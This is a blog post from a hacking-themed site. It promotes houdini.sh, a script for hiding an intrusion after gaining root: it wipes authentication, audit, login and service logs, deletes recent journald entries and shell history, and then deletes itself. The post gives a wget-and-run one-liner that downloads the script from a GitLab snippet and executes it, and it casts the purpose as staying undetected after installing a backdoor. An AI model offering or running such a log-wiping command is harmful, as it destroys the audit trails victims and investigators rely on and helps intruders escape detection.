3 scary tools that use Shodan search engine 3 ways to become root by exploiting the .bashrc file A hidden web shell in the plug-in wireless Planex MZK-DP150N | CVE-2021-37289 Are professional hackers also excellent magicians? Bob’s Cap - CTF Challenge Build your own WiFi Pineapple Tetra for $7. Crack Me 1 - CTF Challenge Crack Me 2 - CTF Challenge CTF Flag Mart - CTF Challenge Damn Cheap Cipher 2 - CTF Challenge Emoji - CTF Challenge Flask Task - CTF Challenge Hacker Kombat (THE GAME) - CTF Challenge Hackermon - CTF Challenge I Love Listings - CTF Challenge JabberJaw - Convert your router in portable network attack device. Not So Simple Cipher - CTF Challenge Pug a Plenty - CTF Challenge Secure any URL or Qr Code with a password! Simple Cipher - CTF Challenge Triva Unsecured - CTF Challenge VPN Ivacy, insecure design vulnerability discovered. Zipper - CTF Challenge

Did you know that professional hackers are also excellent magicians?

Generally speaking, the pattern is always the same. You will find a vulnerability, you will exploit it, then comes the part of privileges escalation. And that's it, you are root, master of the machine and as you don't have time you will install a backdoor, somewhere, well hidden, to do what you want with this new machine later. And then... You logout! The first mistake has just been made.

Why? Because all the actions taken from the point of vulnerability exploitation to gaining root access are recorded in various files on the machine. It's akin to leaving your ID behind at the scene of a successful break-in - not a wise move.

To avoid this issue, I will be discussing about houdini.sh, a Bash script that helps cover the tracks left on a machine with a single command, much like a magician.

But what exactly does houdini.sh do?

On Linux systems, each action performed is recorded in a specific folder, typically /var/logs. Each service may have its own file within that folder for recording any issues, which can be helpful for debugging, but not so much when trying to be discreet.

Here are the files that houdini.sh will clear:

/var/log/audit/audit.log # Audit TTY input

/var/log/auth.log # Authenication logs

/var/log/boot.log # System boot log

/var/log/cron.log # Crond logs

/var/log/faillog # Faillog records

/var/log/httpd # Apache access and error logs directory

/var/log/kern.log # Kernel logs

/var/log/lastlog # SSH Last Login

/var/log/lighttpd # Lighttpd access and error logs directory

/var/log/maillog # Mail server logs

/var/log/messages # General message and system related stuff

/var/log/mysqld.log # MySQL database server log file

/var/log/qmail # Qmail log directory

/var/log/secure # Authentication log

/var/log/system.log # System Log

/var/log/tallylog # Tally Log

/var/log/utmp # Login records file

/var/log/wtmp # Login records file

/var/log/yum.log # Yum command log file

But it will also erase the last 3 hours of entries in the journalctl, as journald stores log data in a binary format instead of plaintext.

Another feature of houdini.sh is that it ensures that all commands entered during the current SSH session are also deleted.

Finally, the script will also delete itself. Leaving no trace behind.

Convenient, isn't it?

How to use

If the terminal is your magic wand then the incantation is the following:

wget https://gitlab.com/-/snippets/2150636/raw/main/houdini.sh && sh houdini.sh

And boom! You just disappeared and succeeded in your first magic trick 🧙

The script is open source and available on GitLab:

https://gitlab.com/-/snippets/2150636

Use it wisely ! On that note, I'm going back to practice new magic tricks!

Thanks for reading!

Did you enjoy reading this article? You might also like this one. 3 scary tools that use Shodan search engine.

https://samy.link/blog/3-scary-tools-that-use-shodan-search-engine